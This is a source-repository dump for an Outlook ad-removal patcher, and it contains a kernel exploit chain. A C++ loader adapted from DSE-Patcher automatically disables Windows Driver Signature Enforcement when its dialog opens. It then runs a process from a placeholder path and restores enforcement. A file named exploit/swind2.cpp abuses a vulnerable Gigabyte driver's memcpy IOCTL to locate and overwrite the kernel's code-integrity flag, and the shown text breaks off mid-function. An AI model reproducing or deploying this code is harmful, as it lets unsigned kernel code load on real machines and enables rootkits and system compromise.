true; 109 | chkDisableWordIcon.CheckState = CheckState.Checked; 110 | chkDisableWordIcon.Location = new Point(12, 271); 111 | chkDisableWordIcon.Name = "chkDisableWordIcon"; 112 | chkDisableWordIcon.Size = new Size(122, 19); 113 | chkDisableWordIcon.TabIndex = 5; 114 | chkDisableWordIcon.Text = "Disable Word icon"; 115 | chkDisableWordIcon.UseVisualStyleBackColor = true; 116 | chkDisableWordIcon.CheckedChanged += chkDisableAll_CheckedChanged; 117 | // 118 | // label3 119 | // 120 | label3.AutoSize = true; 121 | label3.Location = new Point(7, 251); 122 | label3.Name = "label3"; 123 | label3.Size = new Size(108, 15); 124 | label3.TabIndex = 6; 125 | label3.Text = "Product placement"; 126 | // 127 | // chkDisableExcelIcon 128 | // 129 | chkDisableExcelIcon.AutoSize = true; 130 | chkDisableExcelIcon.Checked = true; 131 | chkDisableExcelIcon.CheckState = CheckState.Checked; 132 | chkDisableExcelIcon.Location = new Point(12, 296); 133 | chkDisableExcelIcon.Name = "chkDisableExcelIcon"; 134 | chkDisableExcelIcon.Size = new Size(120, 19); 135 | chkDisableExcelIcon.TabIndex = 7; 136 | chkDisableExcelIcon.Text = "Disable Excel icon"; 137 | chkDisableExcelIcon.UseVisualStyleBackColor = true; 138 | chkDisableExcelIcon.CheckedChanged += chkDisableAll_CheckedChanged; 139 | // 140 | // chkDisablePowerPointIcon 141 | // 142 | chkDisablePowerPointIcon.AutoSize = true; 143 | chkDisablePowerPointIcon.Checked = true; 144 | chkDisablePowerPointIcon.CheckState = CheckState.Checked; 145 | chkDisablePowerPointIcon.Location = new Point(12, 321); 146 | chkDisablePowerPointIcon.Name = "chkDisablePowerPointIcon"; 147 | chkDisablePowerPointIcon.Size = new Size(154, 19); 148 | chkDisablePowerPointIcon.TabIndex = 8; 149 | chkDisablePowerPointIcon.Text = "Disable PowerPoint icon"; 150 | chkDisablePowerPointIcon.UseVisualStyleBackColor = true; 151 | chkDisablePowerPointIcon.CheckedChanged += chkDisableAll_CheckedChanged; 152 | // 153 | // chkDisableOneDriveIcon 154 | // 155 | chkDisableOneDriveIcon.AutoSize = true; 156 | chkDisableOneDriveIcon.Checked = true; 157 | chkDisableOneDriveIcon.CheckState = CheckState.Checked; 158 | chkDisableOneDriveIcon.Location = new Point(213, 296); 159 | chkDisableOneDriveIcon.Name = "chkDisableOneDriveIcon"; 160 | chkDisableOneDriveIcon.Size = new Size(142, 19); 161 | chkDisableOneDriveIcon.TabIndex = 9; 162 | chkDisableOneDriveIcon.Text = "Disable OneDrive icon"; 163 | chkDisableOneDriveIcon.UseVisualStyleBackColor = true; 164 | chkDisableOneDriveIcon.CheckedChanged += chkDisableAll_CheckedChanged; 165 | // 166 | // chkDisableMoreAppsIcon 167 | // 168 | chkDisableMoreAppsIcon.AutoSize = true; 169 | chkDisableMoreAppsIcon.Checked = true; 170 | chkDisableMoreAppsIcon.CheckState = CheckState.Checked; 171 | chkDisableMoreAppsIcon.Location = new Point(213, 321); 172 | chkDisableMoreAppsIcon.Name = "chkDisableMoreAppsIcon"; 173 | chkDisableMoreAppsIcon.Size = new Size(149, 19); 174 | chkDisableMoreAppsIcon.TabIndex = 10; 175 | chkDisableMoreAppsIcon.Text = "Disable More apps icon"; 176 | chkDisableMoreAppsIcon.UseVisualStyleBackColor = true; 177 | chkDisableMoreAppsIcon.CheckedChanged += chkDisableAll_CheckedChanged; 178 | // 179 | // btnApplyRestart 180 | // 181 | btnApplyRestart.Anchor = AnchorStyles.Bottom | AnchorStyles.Left; 182 | btnApplyRestart.Enabled = false; 183 | btnApplyRestart.Location = new Point(300, 428); 184 | btnApplyRestart.Name = "btnApplyRestart"; 185 | btnApplyRestart.Size = new Size(98, 29); 186 | btnApplyRestart.TabIndex = 11; 187 | btnApplyRestart.Text = "&Install"; 188 | btnApplyRestart.UseVisualStyleBackColor = true; 189 | btnApplyRestart.Click += btnApplyRestart_Click; 190 | // 191 | // btnAbout 192 | // 193 | btnAbout.Anchor = AnchorStyles.Bottom | AnchorStyles.Left; 194 | btnAbout.Location = new Point(12, 428); 195 | btnAbout.Name = "btnAbout"; 196 | btnAbout.Size = new Size(98, 29); 197 | btnAbout.TabIndex = 12; 198 | btnAbout.Text = "&About"; 199 | btnAbout.UseVisualStyleBackColor = true; 200 | btnAbout.Click += btnAbout_Click; 201 | // 202 | // timerCheckOutlook 203 | // 204 | timerCheckOutlook.Enabled = true; 205 | timerCheckOutlook.Interval = 1000; 206 | timerCheckOutlook.Tick += timerCheckOutlook_Tick; 207 | // 208 | // chkDisableAll 209 | // 210 | chkDisableAll.AutoSize = true; 211 | chkDisableAll.Checked = true; 212 | chkDisableAll.CheckState = CheckState.Checked; 213 | chkDisableAll.Location = new Point(12, 90); 214 | chkDisableAll.Name = "chkDisableAll"; 215 | chkDisableAll.Size = new Size(120, 19); 216 | chkDisableAll.TabIndex = 13; 217 | chkDisableAll.Text = "Toggle everything"; 218 | chkDisableAll.UseVisualStyleBackColor = true; 219 | chkDisableAll.CheckedChanged += chkDisableAll_CheckedChanged; 220 | // 221 | // label4 222 | // 223 | label4.AutoSize = true; 224 | label4.Location = new Point(7, 343); 225 | label4.Name = "label4"; 226 | label4.Size = new Size(37, 15); 227 | label4.TabIndex = 14; 228 | label4.Text = "Other"; 229 | // 230 | // chkF12 231 | // 232 | chkF12.AutoSize = true; 233 | chkF12.Checked = true; 234 | chkF12.CheckState = CheckState.Checked; 235 | chkF12.Location = new Point(12, 361); 236 | chkF12.Name = "chkF12"; 237 | chkF12.Size = new Size(165, 19); 238 | chkF12.TabIndex = 15; 239 | chkF12.Text = "F12 opens Developer Tools"; 240 | chkF12.UseVisualStyleBackColor = true; 241 | chkF12.CheckedChanged += chkDisableAll_CheckedChanged; 242 | // 243 | // label5 244 | // 245 | label5.Location = new Point(7, 392); 246 | label5.Name = "label5"; 247 | label5.Size = new Size(391, 33); 248 | label5.TabIndex = 16; 249 | label5.Text = "Pressing \"Install\" will close Outlook (olk.exe), apply your settings and restart Outlook (olk.exe) for you."; 250 | // 251 | // chkDisableToDoIcon 252 | // 253 | chkDisableToDoIcon.AutoSize = true; 254 | chkDisableToDoIcon.Checked = true; 255 | chkDisableToDoIcon.CheckState = CheckState.Checked; 256 | chkDisableToDoIcon.Location = new Point(213, 271); 257 | chkDisableToDoIcon.Name = "chkDisableToDoIcon"; 258 | chkDisableToDoIcon.Size = new Size(123, 19); 259 | chkDisableToDoIcon.TabIndex = 17; 260 | chkDisableToDoIcon.Text = "Disable To Do icon"; 261 | chkDisableToDoIcon.UseVisualStyleBackColor = true; 262 | chkDisableToDoIcon.CheckedChanged += chkDisableAll_CheckedChanged; 263 | // 264 | // btnUninstall 265 | // 266 | btnUninstall.Anchor = AnchorStyles.Bottom | AnchorStyles.Left; 267 | btnUninstall.Enabled = false; 268 | btnUninstall.Location = new Point(196, 428); 269 | btnUninstall.Name = "btnUninstall"; 270 | btnUninstall.Size = new Size(98, 29); 271 | btnUninstall.TabIndex = 18; 272 | btnUninstall.Text = "&Uninstall"; 273 | btnUninstall.UseVisualStyleBackColor = true; 274 | btnUninstall.Click += btnApplyRestart_Click; 275 | // 276 | // Form1 277 | // 278 | AcceptButton = btnApplyRestart; 279 | AutoScaleDimensions = new SizeF(7F, 15F); 280 | AutoScaleMode = AutoScaleMode.Font; 281 | ClientSize = new Size(410, 469); 282 | Controls.Add(btnUninstall); 283 | Controls.Add(chkDisableToDoIcon); 284 | Controls.Add(label5); 285 | Controls.Add(chkF12); 286 | Controls.Add(label4); 287 | Controls.Add(chkDisableAll); 288 | Controls.Add(btnAbout); 289 | Controls.Add(btnApplyRestart); 290 | Controls.Add(chkDisableMoreAppsIcon); 291 | Controls.Add(chkDisableOneDriveIcon); 292 | Controls.Add(chkDisablePowerPointIcon); 293 | Controls.Add(chkDisableExcelIcon); 294 | Controls.Add(label3); 295 | Controls.Add(chkDisableWordIcon); 296 | Controls.Add(chkDisableOneDriveBanner); 297 | Controls.Add(chkDisableFirstMailAd); 298 | Controls.Add(label2); 299 | Controls.Add(txtPath); 300 | Controls.Add(label1); 301 | FormBorderStyle = FormBorderStyle.FixedSingle; 302 | KeyPreview = true; 303 | Margin = new Padding(3, 2, 3, 2); 304 | MaximizeBox = false; 305 | MinimizeBox = false; 306 | Name = "Form1"; 307 | StartPosition = FormStartPosition.CenterScreen; 308 | Text = "NewOutlookPatcher"; 309 | TopMost = true; 310 | Load += Form1_Load; 311 | KeyDown += Form1_KeyDown; 312 | ResumeLayout(false); 313 | PerformLayout(); 314 | } 315 | 316 | #endregion 317 | 318 | private Label label1; 319 | private TextBox txtPath; 320 | private Label label2; 321 | private CheckBox chkDisableFirstMailAd; 322 | private CheckBox chkDisableOneDriveBanner; 323 | private CheckBox chkDisableWordIcon; 324 | private Label label3; 325 | private CheckBox chkDisableExcelIcon; 326 | private CheckBox chkDisablePowerPointIcon; 327 | private CheckBox chkDisableOneDriveIcon; 328 | private CheckBox chkDisableMoreAppsIcon; 329 | private Button btnApplyRestart; 330 | private Button btnAbout; 331 | private System.Windows.Forms.Timer timerCheckOutlook; 332 | private CheckBox chkDisableAll; 333 | private Label label4; 334 | private CheckBox chkF12; 335 | private Label label5; 336 | private CheckBox chkDisableToDoIcon; 337 | private Button btnUninstall; 338 | } 339 | } 340 | -------------------------------------------------------------------------------- /NOP/loader2/MyDialog1.cpp: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 19 | 20 | // disable lint warnings for complete source code file 21 | //lint -e459 Warning 459: Function 'MyDlg1DlgProc' whose address was taken has an unprotected access to variable 'g' 22 | //lint -e744 Warning 744: switch statement has no default 23 | //lint -e747 Warning 747: Significant prototype coercion -> This is only used here, because SendMessage needs a lot of type conversions otherwise. 24 | //lint -e750 Warning 750: local macro '_CRT_SECURE_NO_DEPRECATE' not referenced 25 | //lint -e818 Warning 818: Pointer parameter could be declared as pointing to const --- Eff. C++ 3rd Ed. item 3 26 | //lint -e952 Warning 952: Parameter could be declared const --- Eff. C++ 3rd Ed. item 3 27 | //lint -e953 Warning 953: Variable could be declared as const --- Eff. C++ 3rd Ed. item 3 28 | //lint -e1924 Warning 1924: C-style cast -- More Effective C++ #2 29 | 30 | // deprecate unsafe function warnings e.g. strcpy, sprintf 31 | #define _CRT_SECURE_NO_DEPRECATE 32 | #ifndef _DEBUG 33 | #define _NO_CRT_STDIO_INLINE 34 | #endif 35 | 36 | #include 37 | // CreateStatusWindow 38 | #include 39 | #include "resource.h" 40 | #include "MyFunctions.h" 41 | 42 | // CreateStatusWindow 43 | #pragma comment(lib,"comctl32.lib") 44 | 45 | extern GLOBALS g; 46 | 47 | #define PROC_PATH L"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" 48 | 49 | //------------------------------------------------------------------------------ 50 | // create tooltip window and associate the tooltip with the control 51 | //------------------------------------------------------------------------------ 52 | int MyDlg1CreateTooltip(HMODULE hInstance,HWND hDialog,HWND hControl) 53 | { 54 | // create tooltip window 55 | HWND hwndTip = CreateWindowEx(NULL,TOOLTIPS_CLASS,NULL,WS_POPUP | TTS_ALWAYSTIP,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,hDialog,NULL,hInstance,NULL); 56 | if(hwndTip == NULL) 57 | { 58 | return 1; 59 | } 60 | 61 | // associate the tooltip with the control 62 | TOOLINFO toolInfo; 63 | memset(&toolInfo,0,sizeof(TOOLINFO)); 64 | toolInfo.cbSize = sizeof(TOOLINFO); 65 | toolInfo.hwnd = hDialog; 66 | toolInfo.uFlags = TTF_CENTERTIP | TTF_IDISHWND | TTF_SUBCLASS; 67 | toolInfo.uId = (UINT_PTR)hControl; 68 | // if lpszText is set to LPSTR_TEXTCALLBACK, the control sends the TTN_GETDISPINFO notification code to the owner window to retrieve the text 69 | toolInfo.lpszText = LPSTR_TEXTCALLBACK; 70 | SendMessage(hwndTip,TTM_ADDTOOL,0,(LPARAM)&toolInfo); 71 | 72 | // set the visible duration of the tooltip before it closes to 30 seconds 73 | SendMessage(hwndTip,TTM_SETDELAYTIME,TTDT_AUTOPOP,30000); 74 | 75 | return 0; 76 | } 77 | 78 | 79 | //------------------------------------------------------------------------------ 80 | // tooltip set multiline text 81 | //------------------------------------------------------------------------------ 82 | int MyDlg1TooltipSetMultilineText(LPARAM lParam) 83 | { 84 | LPNMTTDISPINFO pInfo = (LPNMTTDISPINFO)lParam; 85 | 86 | // enable multiline tooltip by setting the display rectangle to 500 pixels 87 | // we never use the full width of 500 pixels, because we use newlines for long tooltip text 88 | SendMessage(pInfo->hdr.hwndFrom,TTM_SETMAXTIPWIDTH,0,500); 89 | 90 | // set tooltip text 91 | if((HWND)pInfo->hdr.idFrom == g.Dlg1.hButton1) 92 | { 93 | pInfo->lpszText = "Disable \"Driver Signature Enforcement\":\nSets the variable to \"DSE Disable Value\"."; 94 | } 95 | else if((HWND)pInfo->hdr.idFrom == g.Dlg1.hButton2) 96 | { 97 | pInfo->lpszText = "Enable \"Driver Signature Enforcement\":\nSets the variable to \"DSE Enable Value\"."; 98 | } 99 | else if((HWND)pInfo->hdr.idFrom == g.Dlg1.hButton3) 100 | { 101 | //pInfo->lpszText = "Restore \"Driver Signature Enforcement\":\nSets the variable to \"DSE Original Value\".\n\n" 102 | // "Attention:\nThe \"DSE Original Value\" is retrieved\nonly one time on startup of "APPNAME"!"; 103 | } 104 | else if((HWND)pInfo->hdr.idFrom == g.Dlg1.hCombo1) 105 | { 106 | // check vulnerable driver combo box selection 107 | int sel = (int)SendMessage(g.Dlg1.hCombo1,CB_GETCURSEL,0,0); 108 | if(sel != CB_ERR) 109 | { 110 | // show corresponding tool tip text 111 | // the tool tip text is initialized in the function MyInitVulnerableDrivers 112 | //lint -e{1773} Warning 1773: Attempt to cast away const (or volatile) 113 | pInfo->lpszText = (LPSTR)g.vd[sel].szToolTipText; 114 | } 115 | } 116 | 117 | return 0; 118 | } 119 | 120 | DWORD WINAPI Autorun(PVOID pvoid) { 121 | LPVOID* a = (LPVOID*)pvoid; 122 | 123 | WaitForSingleObject((HANDLE)a[0], INFINITE); 124 | 125 | g.ucRunning = 1; 126 | g.ThreadParams.ttno = ThreadTaskDisableDSE; 127 | HANDLE a1 = CreateThread(NULL, 0, MyThreadProc1, (LPVOID)&g.ThreadParams, 0, NULL); 128 | WaitForSingleObject(a1, INFINITE); 129 | 130 | STARTUPINFOW si; 131 | PROCESS_INFORMATION pi; 132 | ZeroMemory(&si, sizeof(si)); 133 | si.cb = sizeof(si); 134 | ZeroMemory(&pi, sizeof(pi)); 135 | if (CreateProcessW(PROC_PATH, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { 136 | WaitForSingleObject(pi.hProcess, INFINITE); 137 | CloseHandle(pi.hProcess); 138 | CloseHandle(pi.hThread); 139 | } 140 | 141 | g.ucRunning = 1; 142 | g.ThreadParams.ttno = ThreadTaskRestoreDSE; 143 | HANDLE a2 = CreateThread(NULL, 0, MyThreadProc1, (LPVOID)&g.ThreadParams, 0, NULL); 144 | WaitForSingleObject(a2, INFINITE); 145 | 146 | EndDialog((HWND)a[1], 0); 147 | free(a); 148 | return 0; 149 | } 150 | 151 | //------------------------------------------------------------------------------ 152 | // dialog on init 153 | //------------------------------------------------------------------------------ 154 | int MyDlg1OnInitDialog(HWND hwnd) 155 | { 156 | // get control window handles 157 | g.Dlg1.hDialog1 = hwnd; 158 | g.Dlg1.hButton1 = GetDlgItem(hwnd,IDC_BUTTON1); 159 | g.Dlg1.hButton2 = GetDlgItem(hwnd,IDC_BUTTON2); 160 | g.Dlg1.hButton3 = GetDlgItem(hwnd,IDC_BUTTON3); 161 | g.Dlg1.hCombo1 = GetDlgItem(hwnd,IDC_COMBO1); 162 | g.Dlg1.hStatic1 = GetDlgItem(hwnd,IDC_STATIC1); 163 | 164 | // set dialog icons 165 | HICON hIcon1 = LoadIcon(g.hInstance,MAKEINTRESOURCE(IDI_ICON1)); 166 | HICON hIcon2 = LoadIcon(g.hInstance,MAKEINTRESOURCE(IDI_ICON2)); 167 | SendMessage(hwnd,WM_SETICON,ICON_BIG,(LPARAM)hIcon1); 168 | SendMessage(hwnd,WM_SETICON,ICON_SMALL,(LPARAM)hIcon2); 169 | 170 | // set dialog title 171 | //SendMessage(hwnd,WM_SETTEXT,0,(LPARAM)APPNAME" "VERSION" "BUILD); 172 | 173 | // create status bar with two parts 174 | RECT rect; 175 | GetClientRect(hwnd,&rect); 176 | g.Dlg1.hStatusBar1 = CreateStatusWindow(WS_CHILD|WS_VISIBLE,0,hwnd,IDC_STATUS_BAR1); 177 | int widths[2] = {rect.right-50,-1}; 178 | SendMessage(g.Dlg1.hStatusBar1,SB_SETPARTS,2,(LPARAM)widths); 179 | 180 | // set font type for static control 181 | // create font from installed font type 182 | LOGFONT lf; 183 | memset(&lf,0,sizeof(LOGFONT)); 184 | // retrieve handle to device context for client area 185 | HDC hdc = GetDC(hwnd); 186 | // set font size to 8 187 | lf.lfHeight = -MulDiv(8,GetDeviceCaps(hdc,LOGPIXELSY),72); 188 | // release device context 189 | ReleaseDC(hwnd,hdc); 190 | // use "Lucida Console" because it is a monospaced font present on all target OSs 191 | strcpy(lf.lfFaceName,"Lucida Console"); 192 | // create logical font 193 | HFONT hFont = CreateFontIndirect(&lf); 194 | // set font of static control 195 | SendMessage(g.Dlg1.hStatic1,WM_SETFONT,(WPARAM)hFont,FALSE); 196 | 197 | // initialize vulnerable driver structures 198 | //lint -e{534} Warning 534: Ignoring return value of function 199 | MyInitVulnerableDrivers(g.vd,MAX_VULNERABLE_DRIVERS); 200 | 201 | // do this for all vulnerable drivers 202 | for(unsigned int i = 0; i < MAX_VULNERABLE_DRIVERS; i++) 203 | { 204 | // add valid vulnerable driver to combo box 205 | if(g.vd[i].szProvider[0] != 0) SendMessage(g.Dlg1.hCombo1,CB_ADDSTRING,0,(LPARAM)g.vd[i].szProvider); 206 | } 207 | 208 | // select first vulnerable driver in combo box 209 | SendMessage(g.Dlg1.hCombo1,CB_SETCURSEL,0,0); 210 | 211 | // set focus to button 1 212 | SetFocus(g.Dlg1.hButton1); 213 | 214 | // create tooltip window and associate the tooltip with button 1, 2, 3 and combo box 215 | //lint -e{534} Warning 534: Ignoring return value of function 216 | MyDlg1CreateTooltip(g.hInstance,hwnd,g.Dlg1.hButton1); 217 | //lint -e{534} Warning 534: Ignoring return value of function 218 | MyDlg1CreateTooltip(g.hInstance,hwnd,g.Dlg1.hButton2); 219 | //lint -e{534} Warning 534: Ignoring return value of function 220 | MyDlg1CreateTooltip(g.hInstance,hwnd,g.Dlg1.hButton3); 221 | //lint -e{534} Warning 534: Ignoring return value of function 222 | MyDlg1CreateTooltip(g.hInstance,hwnd,g.Dlg1.hCombo1); 223 | 224 | // run initialization thread 225 | g.ucRunning = 1; 226 | g.ThreadParams.ttno = ThreadTaskReadDSEOnFirstRun; 227 | HANDLE a0 = CreateThread(NULL,0,MyThreadProc1,(LPVOID)&g.ThreadParams,0,NULL); 228 | 229 | LPVOID* a = (LPVOID*)(malloc(2 * sizeof(LPVOID))); 230 | a[0] = (PVOID)a0; 231 | a[1] = (PVOID)hwnd; 232 | CreateThread(NULL, 0, Autorun, (LPVOID)a, 0, NULL); 233 | 234 | return 0; 235 | } 236 | 237 | 238 | //------------------------------------------------------------------------------ 239 | // enable or disable the dialog controls 240 | //------------------------------------------------------------------------------ 241 | int MyDlg1EnableControls(unsigned char ucEnable) 242 | { 243 | if(ucEnable == 1) 244 | { 245 | EnableWindow(g.Dlg1.hButton1,TRUE); 246 | EnableWindow(g.Dlg1.hButton2,TRUE); 247 | EnableWindow(g.Dlg1.hButton3,TRUE); 248 | EnableWindow(g.Dlg1.hCombo1,TRUE); 249 | SetFocus(g.Dlg1.hButton1); 250 | } 251 | else 252 | { 253 | EnableWindow(g.Dlg1.hButton1,FALSE); 254 | EnableWindow(g.Dlg1.hButton2,FALSE); 255 | EnableWindow(g.Dlg1.hButton3,FALSE); 256 | EnableWindow(g.Dlg1.hCombo1,FALSE); 257 | SetFocus(g.Dlg1.hButton1); 258 | } 259 | 260 | return 0; 261 | } 262 | 263 | 264 | //------------------------------------------------------------------------------ 265 | // button 1 "DSE Disable" clicked 266 | //------------------------------------------------------------------------------ 267 | int MyDlg1Button1OnClick() 268 | { 269 | // run DSE disable thread 270 | g.ucRunning = 1; 271 | g.ThreadParams.ttno = ThreadTaskDisableDSE; 272 | CreateThread(NULL,0,MyThreadProc1,(LPVOID)&g.ThreadParams,0,NULL); 273 | 274 | return 0; 275 | } 276 | 277 | 278 | //------------------------------------------------------------------------------ 279 | // button 2 "DSE Enable" clicked 280 | //------------------------------------------------------------------------------ 281 | int MyDlg1Button2OnClick() 282 | { 283 | // run DSE enable thread 284 | g.ucRunning = 1; 285 | g.ThreadParams.ttno = ThreadTaskEnableDSE; 286 | CreateThread(NULL,0,MyThreadProc1,(LPVOID)&g.ThreadParams,0,NULL); 287 | 288 | return 0; 289 | } 290 | 291 | 292 | //------------------------------------------------------------------------------ 293 | // button 3 "DSE Restore" clicked 294 | //------------------------------------------------------------------------------ 295 | int MyDlg1Button3OnClick() 296 | { 297 | // run DSE restore thread 298 | g.ucRunning = 1; 299 | g.ThreadParams.ttno = ThreadTaskRestoreDSE; 300 | CreateThread(NULL,0,MyThreadProc1,(LPVOID)&g.ThreadParams,0,NULL); 301 | 302 | return 0; 303 | } 304 | 305 | 306 | //------------------------------------------------------------------------------ 307 | // WM_TIMER message processing 308 | //------------------------------------------------------------------------------ 309 | int MyDlg1OnTimer(WPARAM wParam) 310 | { 311 | UNREFERENCED_PARAMETER(wParam); 312 | 313 | // increment seconds 314 | g.Dlg1.uiTimerSeconds++; 315 | 316 | // change minutes every 60 seconds 317 | if(g.Dlg1.uiTimerSeconds == 60) 318 | { 319 | g.Dlg1.uiTimerMinutes++; 320 | g.Dlg1.uiTimerSeconds = 0; 321 | } 322 | 323 | // change hours every 60 minutes 324 | if(g.Dlg1.uiTimerMinutes == 60) 325 | { 326 | g.Dlg1.uiTimerHours++; 327 | g.Dlg1.uiTimerMinutes = 0; 328 | g.Dlg1.uiTimerSeconds = 0; 329 | } 330 | 331 | // build time string in the format 00:00:00 332 | char szTime[9]; 333 | sprintf(szTime,"%.2u:%.2u:%.2u",g.Dlg1.uiTimerHours,g.Dlg1.uiTimerMinutes,g.Dlg1.uiTimerSeconds); 334 | 335 | // set pane 1 status bar text 336 | SendMessage(g.Dlg1.hStatusBar1,SB_SETTEXT,1,(LPARAM)szTime); 337 | 338 | return 0; 339 | } 340 | 341 | 342 | //------------------------------------------------------------------------------ 343 | // dialog procedure callback 344 | //------------------------------------------------------------------------------ 345 | INT_PTR CALLBACK MyDlg1DlgProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam) 346 | { 347 | switch(uMsg) 348 | { 349 | case WM_TIMER: 350 | //lint -e{534} Warning 534: Ignoring return value of function 351 | MyDlg1OnTimer(wParam); 352 | return 1; 353 | case WM_INITDIALOG: 354 | //lint -e{534} Warning 534: Ignoring return value of function 355 | MyDlg1OnInitDialog(hwnd); 356 | // return FALSE, otherwise the keyboard focus is not set correctly by SetFocus 357 | return 0; 358 | case WM_CLOSE: 359 | // check if thread is running before closing the dialog 360 | if(g.ucRunning == 0) 361 | { 362 | EndDialog(hwnd,0); 363 | } 364 | return 1; 365 | case WM_COMMAND: 366 | switch(LOWORD(wParam)) 367 | { 368 | case IDC_BUTTON1: 369 | switch(HIWORD(wParam)) 370 | { 371 | case BN_CLICKED: 372 | //lint -e{534} Warning 534: Ignoring return value of function 373 | MyDlg1Button1OnClick(); 374 | return 1; 375 | } 376 | break; 377 | case IDC_BUTTON2: 378 | switch(HIWORD(wParam)) 379 | { 380 | case BN_CLICKED: 381 | //lint -e{534} Warning 534: Ignoring return value of function 382 | MyDlg1Button2OnClick(); 383 | return 1; 384 | } 385 | break; 386 | case IDC_BUTTON3: 387 | switch(HIWORD(wParam)) 388 | { 389 | case BN_CLICKED: 390 | //lint -e{534} Warning 534: Ignoring return value of function 391 | MyDlg1Button3OnClick(); 392 | return 1; 393 | } 394 | break; 395 | } 396 | break; 397 | case WM_NOTIFY: 398 | switch(((LPNMHDR)lParam)->code) 399 | { 400 | // this is only triggered if we hover with the mouse over the control 401 | // for the combo box this is only triggered for the button of the control and not the item list 402 | //lint -e{835} Warning 835: A zero has been given as right argument to operator '-' 403 | case TTN_GETDISPINFO: 404 | // tooltip set multiline text 405 | //lint -e{534} Warning 534: Ignoring return value of function 406 | MyDlg1TooltipSetMultilineText(lParam); 407 | return 1; 408 | } 409 | break; 410 | } 411 | 412 | return 0; 413 | } 414 | 415 | //------------------------------------------------------------------------------ 416 | // WinMain 417 | //------------------------------------------------------------------------------ 418 | int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) 419 | { 420 | UNREFERENCED_PARAMETER(hPrevInstance); 421 | UNREFERENCED_PARAMETER(lpCmdLine); 422 | UNREFERENCED_PARAMETER(nCmdShow); 423 | 424 | // zero all global vars 425 | memset(&g,0,sizeof(GLOBALS)); 426 | g.hInstance = hInstance; 427 | 428 | // create dialog box from resource 429 | DialogBoxParam(hInstance,MAKEINTRESOURCE(IDD_DIALOG1),0,MyDlg1DlgProc,0); 430 | 431 | return 0; 432 | } 433 | 434 | -------------------------------------------------------------------------------- /exploit/swind2.cpp: -------------------------------------------------------------------------------- 1 | #include "../global.h" 2 | #include 3 | #include 4 | 5 | #define EQUALS(a, b) (RtlCompareMemory(a, b, sizeof(b) - 1) == (sizeof(b) - 1)) 6 | #define NT_MACHINE L"\\Registry\\Machine\\" 7 | #define SVC_BASE NT_MACHINE L"System\\CurrentControlSet\\Services\\" 8 | 9 | // Gigabyte GIO device name and type, and IOCTL code for memcpy call 10 | #define GIO_DEVICE_NAME L"\\Device\\GIO" 11 | #define FILE_DEVICE_GIO (0xc350) 12 | #define IOCTL_GIO_MEMCPY CTL_CODE(FILE_DEVICE_GIO, 0xa02, METHOD_BUFFERED, FILE_ANY_ACCESS) 13 | 14 | // Input struct for IOCTL_GIO_MEMCPY 15 | typedef struct _GIOMemcpyInput 16 | { 17 | ULONG_PTR Dst; 18 | ULONG_PTR Src; 19 | ULONG Size; 20 | } GIOMemcpyInput, * PGIOMemcpyInput; 21 | 22 | static WCHAR DriverServiceName[MAX_PATH], LoaderServiceName[MAX_PATH]; 23 | 24 | bool CompareByte(const PUCHAR data, const PUCHAR pattern, UINT32 len) 25 | { 26 | for (auto i = 0; i < len; i++) 27 | { 28 | if (data[i] != pattern[i] && pattern[i] != 0) 29 | return false; 30 | } 31 | return true; 32 | } 33 | 34 | static 35 | NTSTATUS 36 | FindKernelModule( 37 | _In_ PCCH ModuleName, 38 | _Out_ PULONG_PTR ModuleBase 39 | ) 40 | { 41 | *ModuleBase = 0; 42 | 43 | ULONG Size = 0; 44 | NTSTATUS Status; 45 | if ((Status = NtQuerySystemInformation(SystemModuleInformation, nullptr, 0, &Size)) != STATUS_INFO_LENGTH_MISMATCH) 46 | return Status; 47 | 48 | const PRTL_PROCESS_MODULES Modules = static_cast(RtlAllocateHeap(RtlProcessHeap(), HEAP_ZERO_MEMORY, 2 * static_cast(Size))); 49 | Status = NtQuerySystemInformation(SystemModuleInformation, 50 | Modules, 51 | 2 * Size, 52 | nullptr); 53 | if (!NT_SUCCESS(Status)) 54 | goto Exit; 55 | 56 | for (ULONG i = 0; i < Modules->NumberOfModules; ++i) 57 | { 58 | RTL_PROCESS_MODULE_INFORMATION Module = Modules->Modules[i]; 59 | if (_stricmp(ModuleName, reinterpret_cast(Module.FullPathName) + Module.OffsetToFileName) == 0) 60 | { 61 | *ModuleBase = reinterpret_cast(Module.ImageBase); 62 | Status = STATUS_SUCCESS; 63 | break; 64 | } 65 | } 66 | 67 | Exit: 68 | RtlFreeHeap(RtlProcessHeap(), 0, Modules); 69 | return Status; 70 | } 71 | 72 | 73 | // For Windows Vista/7 74 | static 75 | LONG 76 | QueryCiEnabled( 77 | _In_ PVOID MappedBase, 78 | _In_ SIZE_T SizeOfImage, 79 | _In_ ULONG_PTR KernelBase, 80 | _Out_ PULONG_PTR gCiEnabledAddress 81 | ) 82 | { 83 | *gCiEnabledAddress = 0; 84 | 85 | ULONG_PTR Offset = 0; 86 | 87 | for (SIZE_T i = 0; i < SizeOfImage; i++) 88 | { 89 | if (CompareByte(PUCHAR(MappedBase) + i, (PUCHAR)Pattern_gCiEnabled, 4)) 90 | { 91 | 